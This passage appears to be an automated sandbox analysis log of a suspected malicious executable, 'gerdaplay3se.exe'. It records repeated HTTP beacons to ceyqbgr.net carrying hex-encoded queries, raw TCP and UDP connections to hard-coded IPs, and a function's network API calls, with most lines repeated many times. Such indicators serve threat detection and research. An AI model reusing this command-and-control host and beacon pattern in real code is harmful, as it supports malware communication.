Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Source: unknown	TCP traffic detected without corresponding DNS query: 89.105.201.183
Source: unknown	TCP traffic detected without corresponding DNS query: 89.105.201.183
Source: unknown	TCP traffic detected without corresponding DNS query: 89.105.201.183
Source: unknown	TCP traffic detected without corresponding DNS query: 89.105.201.183
Source: unknown	TCP traffic detected without corresponding DNS query: 89.105.201.183
Source: unknown	TCP traffic detected without corresponding DNS query: 89.105.201.183
Source: unknown	TCP traffic detected without corresponding DNS query: 89.105.201.183
Source: unknown	TCP traffic detected without corresponding DNS query: 89.105.201.183
Source: unknown	TCP traffic detected without corresponding DNS query: 89.105.201.183
Source: unknown	TCP traffic detected without corresponding DNS query: 89.105.201.183
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 91.211.247.248

Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Code function: 3_2_02D672AB Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,_memset,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,_memset,_memset,_memset,_malloc,_memset,_strtok,_swscanf,_strtok,_free,Sleep,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_sprintf,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_memset,_free,

3_2_02D672AB

Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf815c5ee949b32 HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
